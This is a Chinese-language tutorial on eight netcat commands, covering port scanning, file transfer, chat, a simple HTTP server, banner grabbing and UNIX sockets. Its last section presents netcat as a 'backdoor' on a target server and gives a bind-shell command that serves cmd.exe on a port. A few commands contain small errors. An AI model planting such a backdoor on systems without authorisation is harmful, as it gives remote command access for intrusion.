8 Netcat (nc) 命令及示例
Netcat(或简称nc)是一个简单但功能强大的网络命令行工具,用于在Linux中执行与TCP相关的任何操作,< UDP 或 UNIX 域套接字。
Netcat可用于端口扫描、端口重定向,作为端口侦听器(用于传入连接);它还可以用来打开远程连接和许多其他东西。此外,您还可以将其用作后门来访问目标服务器。
在本文中,我们将通过示例解释Netcat使用命令。
如何在 Linux 中安装和使用 Netcat
要在系统上安装 netcat 软件包,请使用 Linux 发行版的默认软件包管理器。
yum install nc [On CentOS/RHEL]
dnf install nc [On Fedora 22+ and RHEL 8]
sudo apt-get install Netcat [On Debian/Ubuntu]
安装netcat软件包后,您可以在以下示例中进一步学习netcat命令的用法。
端口扫描
Netcat可用于端口扫描:了解目标计算机上哪些端口是开放的并正在运行服务。它可以扫描单个或多个或一系列开放端口。
下面是一个示例,-z
选项将 nc 设置为仅扫描侦听守护进程,而不实际向它们发送任何数据。 -v
选项启用详细模式,-w
指定无法建立连接的超时时间。
nc -v -w 2 z 192.168.56.1 22 #scan a single port
OR
nc -v -w 2 z 192.168.56.1 22 80 #scan multiple ports
OR
nc -v -w 2 z 192.168.56.1 20-25 #scan range of ports
在 Linux 服务器之间传输文件
Netcat 允许您在两台 Linux 计算机或服务器之间传输文件,并且这两个系统都必须安装 nc。
例如,要将 ISO 映像文件从一台计算机复制到另一台计算机并监视传输进度(使用 pv 实用程序),请在发送方/服务器计算机(ISO 文件所在的计算机)上运行以下命令。
这将在端口 3000 上以侦听模式(-l
标志)运行 nc。
tar -zcf - debian-10.0.0-amd64-xfce-CD-1.iso | pv | nc -l -p 3000 -q 5
在接收方/客户端计算机上,运行以下命令来获取该文件。
nc 192.168.1.4 3000 | pv | tar -zxf -
创建命令行聊天服务器
您还可以使用Netcat立即创建一个简单的命令行消息服务器。与前面的使用示例一样,nc 必须安装在用于聊天室的两个系统上。
在一个系统上,运行以下命令来创建侦听端口 5000 的聊天服务器。
nc -l -vv -p 5000
在另一个系统上,运行以下命令以启动与运行消息传递服务器的计算机的聊天会话。
nc 192.168.56.1 5000
创建基本的 Web 服务器
使用nc命令的-l
选项来创建一个基本的、不安全的Web服务器来为学习目的提供静态Web文件。为了演示这一点,请创建一个 .html
文件,如下所示。
vim index.html
在文件中添加以下 HTML 行。
<html>
<head>
<title>Test Page</title>
</head>
<body>
<p>Serving this file using Netcat Basic HTTP server!</p>
</body>
</html>
保存文件中的更改并退出。
然后通过运行以下命令通过 HTTP 提供上述文件,这将使 HTTP 服务器能够持续运行。
while : ; do ( echo -ne "HTTP/1.1 200 OK\r\n" ; cat index.html; ) | nc -l -p 8080 ; done
然后打开网络浏览器,可以使用以下地址访问内容。
http://localhost:8080
OR
http://SERVER_IP:8080
请注意,您可以通过按 [Ctrl+ C]
来停止 Netcat HTTP 服务器。
Linux 服务器连接故障排除
Netcat 的另一个有用用途是解决服务器连接问题。在这里,您可以使用Netcat来验证服务器正在发送哪些数据来响应客户端发出的命令。
以下命令检索 example.com 的主页。
printf "GET / HTTP/1.0\r\n\r\n" | nc text.example.com 80
上述命令的输出包括网络服务器发送的标头,可用于故障排除。
查找端口上运行的服务
您还可以使用Netcat来获取端口横幅。在这种情况下,它会告诉您某个端口后面正在运行什么服务。例如,要了解特定服务器上的端口 22 后面正在运行什么类型的服务,请运行以下命令(将 192.168.56.110 替换为目标服务器的 IP 地址)。 -n
标志表示禁用 DNS 或服务查找。
nc -v -n 192.168.56.110 80
创建流套接字
Netcat 还支持创建 UNIX 域流套接字。以下命令将创建并侦听 UNIX 域流套接字。
nc -lU /var/tmp/mysocket &
ss -lpn | grep "/var/tmp/"
创建后门
您也可以将 Netcat 作为后门运行。然而,这需要更多的工作。如果目标服务器上安装了Netcat,则可以使用它创建后门,以获取远程命令提示符。
要充当后门,您需要 Netcat 侦听目标服务器上选定的端口(例如端口 3001),然后您可以按如下方式从计算机连接到该端口。
这是旨在在远程服务器上运行的命令,其中 -d
选项禁用从 stdin 读取,而 -e
指定要在目标系统上运行的命令。
nc -L -p 3001 -d -e cmd.exe
最后但并非最不重要的一点是,Netcat 可以用作不同服务/协议的代理,包括 HTTP、SSH 等。有关更多信息,请参阅其手册页。
man nc
在这篇文章中,我们解释了8个实用的Netcat命令使用示例。如果您知道任何其他实际用例,请通过下面的反馈表与我们分享。您也可以提出问题。